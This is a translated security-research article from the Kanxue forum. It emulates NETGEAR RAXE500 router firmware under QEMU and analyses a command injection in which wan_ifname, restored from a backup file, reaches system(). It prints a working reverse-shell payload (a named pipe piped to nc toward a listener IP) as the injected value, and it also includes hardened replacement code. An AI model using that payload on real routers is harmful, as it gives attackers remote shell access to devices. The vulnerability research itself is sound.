Summary: The article details how to build an emulation environment for the NETGEAR RAXE500 firmware and how a command-injection vulnerability was found in it: the firmware is unpacked with binwalk, httpd is started under chroot + QEMU, the shared-memory, certificate and NVRAM dependencies are resolved one by one, the backup-restore function is used to write a malicious wan_ifname, and a system() call is finally triggered when IPV6_disable.cgi is accessed, yielding a reverse shell. Full reproduction steps and code examples are given. Overall score: 87. Categories: vulnerability analysis, IoT security, security tools, hands-on experience
NETGEAR Router Environment Emulation and Vulnerability Analysis
易之生生
看雪学苑
January 20, 2026, 17:59, Shanghai
01
Environment Setup
Version: Nighthawk AX12 RAXE500 V1.2.14.114_2.0.67
First, unpack the firmware with binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chk.
# binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chk
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
58 0x3A Flattened device tree, size:969 bytes, version:17
1030 0x406 Flattened device tree, size:9970 bytes, version:17
42870 0xA776 CRC32 polynomial table, little endian
703534 0xABC2E CRC32 polynomial table, little endian
WARNING:Extractor.execute failed to run external extractor 'lzop -f -d '%e'': [Errno 2] No such file or directory:'lzop', 'lzop -f -d '%e'' might not be installed correctly
761969 0xBA071 LZO compressed data
836250 0xCC29A HTML document header
836500 0xCC394 HTML document footer
836532 0xCC3B4 HTML document header
837187 0xCC643 HTML document footer
837211 0xCC65B HTML document header
838626 0xCCBE2 HTML document footer
838650 0xCCBFA HTML document header
839246 0xCCE4E HTML document footer
957782 0xE9D56 Flattened device tree, size:5913 bytes, version:17
963698 0xEB472 LZMA compressed data, properties:0x5D, dictionary size:8388608 bytes, uncompressed size:-1 bytes
4587594 0x46004A Flattened device tree, size:49513 bytes, version:17
4637110 0x46C1B6 Flattened device tree, size:49513 bytes, version:17
4686626 0x478322 Flattened device tree, size:47694 bytes, version:17
4734322 0x483D72 Flattened device tree, size:50144 bytes, version:17
4784466 0x490152 Flattened device tree, size:50144 bytes, version:17
4834610 0x49C532 Flattened device tree, size:49601 bytes, version:17
4884214 0x4A86F6 Flattened device tree, size:49633 bytes, version:17
4933850 0x4B48DA Flattened device tree, size:49557 bytes, version:17
4983410 0x4C0A72 Flattened device tree, size:49677 bytes, version:17
5033090 0x4CCC82 Flattened device tree, size:47733 bytes, version:17
5080826 0x4D86FA Flattened device tree, size:48647 bytes, version:17
5129474 0x4E4502 Flattened device tree, size:48802 bytes, version:17
5178278 0x4F03A6 Flattened device tree, size:48802 bytes, version:17
5227082 0x4FC24A Flattened device tree, size:48767 bytes, version:17
5275850 0x5080CA Flattened device tree, size:48767 bytes, version:17
5324618 0x513F4A Flattened device tree, size:48767 bytes, version:17
5373386 0x51FDCA Flattened device tree, size:50605 bytes, version:17
5423994 0x52C37A Flattened device tree, size:50605 bytes, version:17
5474602 0x53892A Flattened device tree, size:50412 bytes, version:17
5525014 0x544E16 Squashfs filesystem, little endian, version 4.0, compression:xz, size:78884152 bytes, 3245 inodes, blocksize:131072 bytes, created:2025-05-16 08:07:54
Enter the squashfs-root directory and run sudo chroot . bin/sh to enter the firmware environment.
# sudo chroot . bin/sh
BusyBox v1.31.1 (2025-05-16 15:16:50 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls -la
drwxrwxrwx 22 1000 1000 4096 May 16 2025 .
drwxrwxrwx 22 1000 1000 4096 May 16 2025 ..
-rw-r--r-- 1 1000 1000 0 May 16 2025 .init_enable_core
drwxr-xr-x 2 1000 1000 4096 May 16 2025 bin
drwxrwxr-x 3 1000 1000 4096 May 16 2025 data
lrwxrwxrwx 1 1000 1000 16 May 16 2025 debug -> sys/kernel/debug
drwxrwxr-x 3 1000 1000 4096 May 16 2025 dev
drwxr-xr-x 20 1000 1000 4096 May 16 2025 etc
drwxrwxr-x 3 1000 1000 4096 May 16 2025 home
drwxrwxr-x 2 1000 1000 4096 May 16 2025 include
drwxrwxr-x 6 1000 1000 20480 May 16 2025 lib
drwxrwxr-x 3 1000 1000 4096 May 16 2025 lib64
drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc2
drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc3
drwxrwxr-x 2 1000 1000 4096 May 16 2025 mnt
drwxrwxr-x 9 1000 1000 4096 May 16 2025 opt
drwxrwxr-x 2 1000 1000 4096 May 16 2025 proc
drwxr-xr-x 2 1000 1000 4096 May 16 2025 sbin
drwxr-xr-x 6 1000 1000 4096 May 16 2025 share
drwxrwxr-x 3 1000 1000 4096 May 16 2025 sys
lrwxrwxrwx 1 1000 1000 8 May 16 2025 tmp -> /var/tmp
drwxr-xr-x 10 1000 1000 4096 May 16 2025 usr
drwxrwxr-x 2 1000 1000 4096 May 16 2025 var
drwxrwxr-x 3 1000 1000 4096 May 16 2025 webs
drwxr-xr-x 11 1000 1000 32768 May 16 2025 www
#
Running usr/sbin/httpd directly fails; the runtime directories have to be created first, following the commands in the etc/init.d/mount-fs.sh script.
# usr/sbin/httpd
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
/tmp/shm_id opened error!
Commands to create the directory environment:
# mkdir -p /var/log /var/run /var/state/dhcp /var/ppp /var/udhcpd /var/zebra /var/siproxd /var/cache /var/tmp /var/samba /var/samba/share /var/samba/homes /var/samba/private /var/samba/locks
Running it again still fails; the value stored in /tmp/shm_id needs to be changed to 0:
# usr/sbin/httpd
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
segment_id:5 , in /tmp/shm_id.
Get a incorrect Segment_ID:5 and semaphore ID:-1
something wrong in getting shm_id.
Running it again afterwards fails at a later point:
# usr/sbin/httpd
libacos_debug_log build time: Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time: Jan 11 2024 09:55:00
segment_id: 0 , in /tmp/shm_id.
Get a correct Segment_ID: 0 and semaphore ID:0
Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);
Can't find handler for ASP command: genie_cgi_need_to_load_basic();
Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();
Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");
Can't find handler for ASP command: eco_get_redirect_link();
Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")
Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")
Can't find handler for ASP command: attached_devices_cgi_edit_name("model")
Can't find handler for ASP command: attached_devices_cgi_edit_name("name")
Can't find handler for ASP command: attached_devices_cgi_edit_name("type")
Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")
Can't find handler for ASP command: wlg_cgi_get_isolation_status();
Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");
Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();
Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");
Can't find handler for ASP command: qos_cgi_get_bandwidth();
Can't find handler for ASP command: qos_cgi_get_mac();
Can't find handler for ASP command: qos_cgi_get_custom_table();
Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();
Can't find handler for ASP command: cdl_cgi_set_hijack(1);
Can't find handler for ASP command: genie_cgi_get_client_type();
Can't find handler for ASP command: 13
Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();
Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();
Can't find handler for ASP command: cdl_cgi_set_hijack(0);
Can't find handler for ASP command: check_is_index()
Can't find handler for ASP command: gui_get_opmode_param("pre_mode");
Can't find handler for ASP command: isPortTrunking("is_ptk_start");
Can't find handler for ASP command: isPortTrunking("is_ptk_end");
# can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
dil init
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
usr/sbin/httpd(pid=4777) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
#
02
Certificate Setup
Debugging with GDB shows that the value of tmp_h_c is empty; the code is as follows:
Analyzing the code shows that startup arguments must be added: /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
Running it again reports that certificate generation failed:
# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
Generating a RSA private key
Error Generating Key
1082140528:error:0E06D06C:lib(14):func(109):reason(108):NA:0:group=req name=default_bits
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:04081003:lib(4):func(129):reason(3):NA:0:
Inspecting the devices under /dev/ shows that /dev/random and /dev/urandom are missing, so the failure is caused by insufficient entropy; the host's /dev needs to be bind-mounted into the firmware directory:
# sudo mount -o bind /dev ./dev/
Running it again succeeds:
# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
libacos_debug_log build time: Feb 17 2022 18:15:22
libhttpd build time: Jan 11 2024 09:55:00
Generating a RSA private key
................................................+++++
..............+++++
writing new private key to '/tmp/h.k'
-----
read_board_data():can't open file /misc2/.bd_data
read_board_data():can't open file /misc2/.bd_data
read_board_data():can't open file /misc2/.bd_data
/usr/sbin/httpd(pid=5128) is calling shared_acos_nvram_commit:
segment_id: 0 , in /tmp/shm_id.
Get a correct Segment_ID: 0 and semaphore ID:0
Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);
Can't find handler for ASP command: genie_cgi_need_to_load_basic();
Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();
Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");
Can't find handler for ASP command: eco_get_redirect_link();
Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")
Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")
Can't find handler for ASP command: attached_devices_cgi_edit_name("model")
Can't find handler for ASP command: attached_devices_cgi_edit_name("name")
Can't find handler for ASP command: attached_devices_cgi_edit_name("type")
Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")
Can't find handler for ASP command: wlg_cgi_get_isolation_status();
Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");
Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();
Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");
Can't find handler for ASP command: qos_cgi_get_bandwidth();
Can't find handler for ASP command: qos_cgi_get_mac();
Can't find handler for ASP command: qos_cgi_get_custom_table();
Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();
Can't find handler for ASP command: cdl_cgi_set_hijack(1);
Can't find handler for ASP command: genie_cgi_get_client_type();
Can't find handler for ASP command: 13
Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();
Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();
Can't find handler for ASP command: cdl_cgi_set_hijack(0);
Can't find handler for ASP command: check_is_index()
Can't find handler for ASP command: gui_get_opmode_param("pre_mode");
Can't find handler for ASP command: isPortTrunking("is_ptk_start");
Can't find handler for ASP command: isPortTrunking("is_ptk_end");
# can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
dil init
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
cert file /tmp/h.c, key file /tmp/h.k
>>> start to launch lighttpd
killall: lighttpd: no process killed
2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use
#
03
NVRAM Emulation
Although the HTTPD service now runs, the web page cannot be accessed; accessing it prints the following:
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
cert file /tmp/h.c, key file /tmp/h.k
>>> start to launch lighttpd
killall: lighttpd: no process killed
2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
The corresponding code is as follows:
The value of ddns_hostname needs to be read from NVRAM, so an nvram.ini file and a shared object that emulates the acosNvramConfig_* functions are now required.
On GitHub there is a libnvram_faker/conf/netgear/nvram.ini configuration file; the following functions are then emulated through hooks:
The acosNvramConfig.c code that hooks acosNvramConfig is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>
#include <errno.h>
// Assumed configuration-file path
#define ROUTE_CONFIG_PATH "/tmp/route.cfg"
#define MAX_LINE_LENGTH 256
#define MAX_KEY_LENGTH 64
#define MAX_VALUE_LENGTH 128
// Function declarations
char *nvm_get_value(const char *key);
char *nvm_get_value_no_alloc(const char *key, char *buffer, size_t buffer_size);
The code is too long; omitted...
The /tmp/route.cfg configuration file is as follows:
fw_spi=1
usb_info_dev7=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
http_server_wan_enable=0
wifi_mac12=62:c0:02:11:22:33
wan_fix_dns=0
wifi_wep_on12=0
usb_info_dev83=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
wifi_auth_type3=3
wan_iptype=Dynamic
usb_info_dev8=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
usb_info_dev63=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
wifi_ssid4=NETGEAR_Guest3
There are too many entries; omitted...
Compile it into acosNvramConfig.so and place it in the lib directory:
# arm-linux-gnueabi-gcc -shared -fPIC acosNvramConfig.c -o acosNvramConfig.so -ldl
route.cfg needs updating: change lan_ipaddr=192.168.1.1 to the local address 127.0.0.1, then run the following command:
# LD_PRELOAD=acosNvramConfig.so /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
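As an added example that is not the article's acosNvramConfig.c (whose body is omitted above), the following is a complete minimal shim in the same spirit: it answers httpd's acosNvramConfig_get() from /tmp/route.cfg and keeps the parsing in a separately testable nvm_lookup(). The SAMPLE_CFG contents, the 64 KiB file buffer and the choice to return an empty string for unknown keys are this example's assumptions.

```c
/* Added example (not the article's acosNvramConfig.c): a minimal LD_PRELOAD shim
 * that answers httpd's acosNvramConfig_get() from the key=value file the article
 * uses. Returning "" for unknown keys and the buffer sizes are this shim's choices. */
#include <stdio.h>
#include <string.h>

#define ROUTE_CONFIG_PATH "/tmp/route.cfg"   /* path used in the article */
#define MAX_VALUE_LENGTH  128

/* Constructed sample in route.cfg format (not taken from a real device). */
#define SAMPLE_CFG "lan_ipaddr=127.0.0.1\nwan_if=x\nwan_ifname=eth0\n" \
                   "board_id=U12H449T00_NETGEAR\nhttp_server_wan_enable=0\n"

static char nvm_value[MAX_VALUE_LENGTH];  /* shared return buffer, as NVRAM libs do */

/* Find "key=value" in newline-separated cfg. The key must match exactly, so
 * "wan_if" never matches "wan_ifname"; the value may itself contain '='.
 * Copies at most outsz-1 bytes into out and returns it, or NULL if absent. */
char *nvm_lookup(const char *cfg, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    for (const char *p = cfg; p && *p; ) {
        const char *eol = strchr(p, '\n');
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);
        if (linelen > klen && p[klen] == '=' && memcmp(p, key, klen) == 0) {
            size_t vlen = linelen - klen - 1;
            if (vlen >= outsz) vlen = outsz - 1;
            memcpy(out, p + klen + 1, vlen);
            out[vlen] = '\0';
            return out;
        }
        p = eol ? eol + 1 : NULL;
    }
    return NULL;
}

/* The symbol httpd resolves through LD_PRELOAD. Build as in the article:
 * arm-linux-gnueabi-gcc -shared -fPIC acosNvramConfig.c -o acosNvramConfig.so */
char *acosNvramConfig_get(const char *key)
{
    static char cfg[1 << 16];   /* whole route.cfg; enlarge if the file is bigger */
    FILE *f = fopen(ROUTE_CONFIG_PATH, "rb");
    size_t n = f ? fread(cfg, 1, sizeof cfg - 1, f) : 0;
    if (f) fclose(f);
    cfg[n] = '\0';
    nvm_value[0] = '\0';          /* unknown key -> "" rather than NULL */
    nvm_lookup(cfg, key, nvm_value, sizeof nvm_value);
    return nvm_value;
}
```

Because the file is re-read on every call, edits to route.cfg (such as the board_id fix below) take effect without restarting httpd.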
Accessing http://127.0.0.1/ gives the following error:
Device is not authorizied!
The code that produces this error is as follows:
The value of dword_1439FA4 comes from the is_authorizied() function:
The is_authorizied function lives in libacos_nvram.so; its code is as follows:
It reads board_id from NVRAM and compares it against U12H449 and similar values; searching for U12H449, U12H449T00_NETGEAR was chosen as the board_id:
After adding board_id=U12H449T00_NETGEAR to route.cfg, http://127.0.0.1/start.htm loads successfully, although an unexplained (Segmentation fault) – core dumped sometimes occurs:
04
Vulnerability Analysis
When ipv6_disable.cgi is accessed, the following code runs:
v11 = (const char *)acosNvramConfig_get((int)"wan_ifname");
snprintf(s, 0x80u, "ifconfig %s mtu %d", v11, v9);
system(s);
The value of wan_ifname is read from NVRAM and used, unchecked, as part of the argument to system():
And the value of wan_ifname can be set through the backup-file restore function at https://127.0.0.1/BAK_backup.htm:
The file-upload code is as follows:
The shared_acos_nvram_restore_configuration code in libacos_nvram.so is as follows:
The configuration-restore code is just a simple cp, so the restored file is taken as-is.
For testing, modify the route.cfg file to set wan_ifname=eth0&rm /tmp/f 2>/dev/null; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.3.3 9999 > /tmp/f&,
then open a listener on port 9999:
# nc -lvvp 9999
Listening on 0.0.0.0 9999
Open the https://127.0.0.1/IPV6_disable.htm page and click the Apply button, and the reverse shell is obtained:
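As an added example (not NETGEAR's code), here is the sink from IPV6_disable.cgi in the shape shown above, placed beside a hardened version that validates wan_ifname as an interface name and execs ifconfig without a shell. The function names, the /sbin/ifconfig path and the MTU bounds are this example's assumptions.

```c
/* Added example (not NETGEAR's code): the sink the article shows in IPV6_disable.cgi
 * beside a hardened version. wan_ifname comes from NVRAM, which a restored backup
 * controls, so system() runs any shell metacharacters the value carries. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Same shape as the decompiled code; kept only for comparison. */
int set_wan_mtu_unsafe(const char *wan_ifname, int mtu)
{
    char s[0x80];
    snprintf(s, sizeof s, "ifconfig %s mtu %d", wan_ifname, mtu);
    return system(s);          /* /bin/sh parses whatever wan_ifname contains */
}

/* A value used as an interface name must look like one: 1..15 bytes of
 * [A-Za-z0-9._-], not starting with '-' (so it cannot become an option). */
int is_safe_ifname(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > 15 || name[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Hardened form: validate, then exec ifconfig with an argv and no shell, so
 * metacharacters are never interpreted even if the check were later relaxed.
 * MTU bounds are this example's policy. Returns the exit status, or -1. */
int set_wan_mtu_safe(const char *wan_ifname, int mtu)
{
    char mtu_str[16];
    if (!is_safe_ifname(wan_ifname) || mtu < 68 || mtu > 65535) return -1;
    snprintf(mtu_str, sizeof mtu_str, "%d", mtu);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execl("/sbin/ifconfig", "ifconfig", wan_ifname, "mtu", mtu_str, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same is_safe_ifname() check applied at restore time, before the uploaded backup is copied over the live configuration, would reject the wan_ifname value used in the test above.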
Kanxue ID: 易之生生
https://bbs.kanxue.com/user-home-920134.htm
*This article is a featured Kanxue forum article, originally written by 易之生生; when reposting, please credit the Kanxue community.
This article is reposted from: 看雪学苑, 易之生生, "NETGEAR Router Environment Emulation and Vulnerability Analysis"